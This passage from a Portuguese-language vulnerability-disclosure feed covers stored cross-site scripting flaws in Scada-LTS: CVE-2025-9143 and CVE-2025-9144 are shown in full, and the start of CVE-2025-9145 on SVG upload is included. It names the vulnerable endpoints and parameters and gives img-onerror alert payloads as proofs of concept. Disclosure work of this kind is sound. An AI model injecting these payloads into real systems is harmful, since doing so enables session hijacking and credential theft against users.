    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-9139.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;localizador&amp;#34;&amp;gt;Localizador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9143</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9143/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9143/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9143-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-mailing_listsshtm&amp;#34;&amp;gt;CVE-2025-9143: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9143&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9143&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;userList&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;address&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9143-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-mailing_listsshtm&amp;#34;&amp;gt;CVE-2025-9143: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9143&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9143&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;userList&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;address&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;userList&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;address&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;userList&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;address&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(40)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9143/image.png&amp;#34;
	width=&amp;#34;651&amp;#34;
	height=&amp;#34;282&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9143/image_hu_f77d2b1f1c4b31b9.png 480w, /p/cve-2025-9143/image_hu_a232c9a2c6913e32.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;230&amp;#34;
		data-flex-basis=&amp;#34;554px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9143/image-1.png&amp;#34;
	width=&amp;#34;631&amp;#34;
	height=&amp;#34;309&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9143/image-1_hu_e0bceb375f809227.png 480w, /p/cve-2025-9143/image-1_hu_255f4bd3b7c4235d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;204&amp;#34;
		data-flex-basis=&amp;#34;490px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9143/image-2.png&amp;#34;
	width=&amp;#34;635&amp;#34;
	height=&amp;#34;301&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9143/image-2_hu_e954bce300e18350.png 480w, /p/cve-2025-9143/image-2_hu_c4a2e415bf078fda.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;210&amp;#34;
		data-flex-basis=&amp;#34;506px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9143.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9143.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9144</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9144/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9144/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9144-cross-site-scripting-xss-armazenado-no-endpoint-publisher_editshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-9144: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9144&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9144&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9144-cross-site-scripting-xss-armazenado-no-endpoint-publisher_editshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-9144: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9144&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9144&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(32)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9144/image.png&amp;#34;
	width=&amp;#34;632&amp;#34;
	height=&amp;#34;301&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9144/image_hu_74749039920d3c9.png 480w, /p/cve-2025-9144/image_hu_425acfacce4d9280.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;503px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9144.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9144.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9145</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9145/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9145/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9145-injeção-de-cross-site-scripting-xss-armazenado-por-upload-de-arquivo-svg&amp;#34;&amp;gt;CVE-2025-9145: Injeção de Cross-Site Scripting (XSS) armazenado por Upload de Arquivo SVG
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9145&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9145&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenado via desvio de upload de arquivo SVG foi identificada no endpoint &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores enviem arquivos maliciosos para o parâmetro &amp;lt;code&amp;gt;backgroundImageMP&amp;lt;/code&amp;gt;. Os arquivos injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada por usuários, representando um risco significativo à segurança.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9145-injeção-de-cross-site-scripting-xss-armazenado-por-upload-de-arquivo-svg&amp;#34;&amp;gt;CVE-2025-9145: Injeção de Cross-Site Scripting (XSS) armazenado por Upload de Arquivo SVG
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9145&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9145&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
